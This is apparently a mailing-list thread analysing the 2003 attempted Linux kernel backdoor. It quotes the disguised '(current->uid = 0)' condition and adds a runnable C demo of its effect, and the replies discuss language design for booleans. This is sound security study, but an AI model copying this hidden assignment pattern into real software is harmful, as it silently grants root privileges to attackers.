Linux security: mixing assignment with expression

Dave Benjamin

Hey folks,

I was just reading about the attempt to insert a backdoor into the Linux
kernel. You can read the details here:

http://kerneltrap.org/node/view/1584

This is the code that the attacker inserted:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

Notice the "current->uid = 0" expression? I think it's pretty clear that the
intent was to confuse the reader, to make the above code appear like it's
doing a comparison, when actually it is assigning 0 to the user ID (0 being
the root user).

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".
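
The inserted condition beside the comparison it imitates, as an added example that is not part of the original post or the kernel source. `struct demo_task`, the `DEMO_*` flag values, `uid_after` and the function names are constructed stand-ins so the snippet runs in user space.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel's flag values and task struct. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

struct demo_task { unsigned int uid; };

/* The condition as inserted: "=" assigns 0 to uid. The value of that
 * assignment is 0 (false), so the branch is never taken and retval stays 0;
 * the only observable effect is the changed uid. */
static int check_inserted(struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the line appears to say: a comparison with no side effect. */
static int check_compare(const struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one variant on a fresh uid-1000 task and report the uid afterwards. */
static unsigned int uid_after(int use_inserted, unsigned int options, int *retval)
{
    struct demo_task t = { 1000 };
    *retval = use_inserted ? check_inserted(&t, options)
                           : check_compare(&t, options);
    return t.uid;
}

int main(void)
{
    int rv;
    unsigned int both = DEMO_WCLONE | DEMO_WALL;
    printf("inserted, both flags: uid=%u\n", uid_after(1, both, &rv));
    printf("compare,  both flags: uid=%u\n", uid_after(0, both, &rv));
    printf("inserted, one flag:   uid=%u\n", uid_after(1, DEMO_WALL, &rv));
    return 0;
}
```

Because the assignment sits inside its own parentheses, GCC and Clang do not report it under `-Wall`, so catching this form falls to code review or a lint rule that rejects assignments inside conditions.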
 
Jay O'Connor

> In this case, the ability to mix assignment with expression in C not only
> affected readability but--as a result--security. I think this clearly lends
> credibility to Guido's design decision to deliberately prevent this sort of
> "mistake".

I still prefer the solutions from other languages that use real
boolean types and then either don't allow boolean evaluation of
numbers (Smalltalk) or don't allow assignment of numbers to booleans
(Ada)
 
Dave Benjamin

> I still prefer the solutions from other languages that use real
> boolean types and then either don't allow boolean evaluation of
> numbers (Smalltalk) or don't allow assignment of numbers to booleans
> (Ada)

This still wouldn't be sufficient to prevent the following (admittedly
contrived) example:

    if foo in [BAR, BAZ] and (admin_privileges = True):
        return oof

As far as the boolean evaluation issue is concerned, it's a tradeoff between
convenience and clarity sometimes. It's nice to treat an empty list as a
false value:

    if items_left:
        item = items_left.pop()
        diddle(item)

But maybe we're back to the ol' implicit/explicit argument.

Smalltalk is particularly unusual in how it handles booleans. In Python
syntax, it would have to be something like:

    Boolean(len(items_left) != 0).ifTrue(lambda: diddle(items_left.pop()))
 
